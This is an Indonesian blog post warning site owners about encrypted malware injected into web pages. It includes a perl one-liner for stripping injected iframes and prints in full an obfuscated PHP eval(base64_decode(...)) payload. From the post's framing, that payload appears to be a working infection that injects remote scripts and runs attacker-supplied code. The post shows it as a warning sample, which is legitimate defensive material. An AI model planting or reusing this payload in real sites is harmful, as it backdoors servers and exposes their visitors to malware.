Web Stats Web Hosting Blogs - BlogCatalog Blog Directory TopOfBlogs

Masukan email anda untuk mendapatkan artikel terbaru:

hab.la

Payah jika, Injeksi Malware dengan Script yang terenkripsi

Haizz ngga semua injeksi iframe / script codenya bisa dibaca dengan kasat mata,  ataupun pinginya dengan se-enaknya mengeksekusi peritah shell berikut

# find . -name ‘*.*’ | xargs perl -pi -e ’s/\<iframe src.*vistasearch\.info.*$\<\/iframe>//g’

dengan tujuan menghapus script secara global tanpa perlu melakukan e diting satu – per – satu pada  setiap file.  silahkan baca bahasan website  diblokir google akibat injeksi iframe untuk lebih jelasnya cara eksekusi perintah shell tersebut.

dan ketika script injeksi yang masuk kedalam website anda seperti ini

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnaXF1MTInKSl7ZnVuY3Rpb24gaXF1MTIoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMlpoYzNSaFkzUnBiMjV3Y205alpYTnphVzVuTG1OdmJTOXBiV0ZuWlhNdmIzVjBjMjkxY21OcGJtY3RiVzl5ZEdkaFoyVXRjSEp2WTJWemMybHVaeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGlxdTEyMigkYSwkYiwkYywkZCl7Z2xvYmFsJGlxdTEyMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkaXF1MTIxKSljYWxsX3VzZXJfZnVuYygkaXF1MTIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdpcXUxMicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2lxdTEyJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGlxdTEybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignaXF1MTIyJykpIT0naXF1MTIyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>

Maka bersiap-siaplah bongkar setiap file yang ada.

akhir-kata berhati-hatilah dalam berselancar di dunia maya apalagi copy paste script karena buktinya website Broker Review aja Terkena Malware apalagi blog kita.

VN:F [1.9.3_1094]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.3_1094]
Rating: 0 (from 0 votes)

Incoming search terms for the article:

Related posts:

  1. Awas Injeksi Malware dari situs Broker Review Injeksi iframe yang disebabkan malware makin merajarela, bahkan situs broker...
  2. Website diblokir Google akibat injeksi iframe Apakah anda pernah mendapati web anda tampil seperti ini Bisa...
  3. awas Malware money2008.org dan Js/Downloader menginjeksi situs anda beberapa waktu lalu satu situs yang sempat saya kelola dan...
  4. Banyak IP local yang mungkin terinfeksi Malware Setelah kita bersihkan daftar blocking ip dari CSF ternyata dalam...
  5. WHMCS 4.0 yang penuh dengan BUG siapa yang tidak kenal satu applikasi billing untuk hoster yang...

Related posts brought to you by Yet Another Related Posts Plugin.

1 comment to Payah jika, Injeksi Malware dengan Script yang terenkripsi

  • Great blog, although I think some of the stuff on itt is a little pre used lol.

    VA:F [1.9.3_1094]
    Rating: 0.0/5 (0 votes cast)
    VA:F [1.9.3_1094]
    Rating: 0 (from 0 votes)

Leave a Reply

 

 

 

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre lang="" line="" escaped="">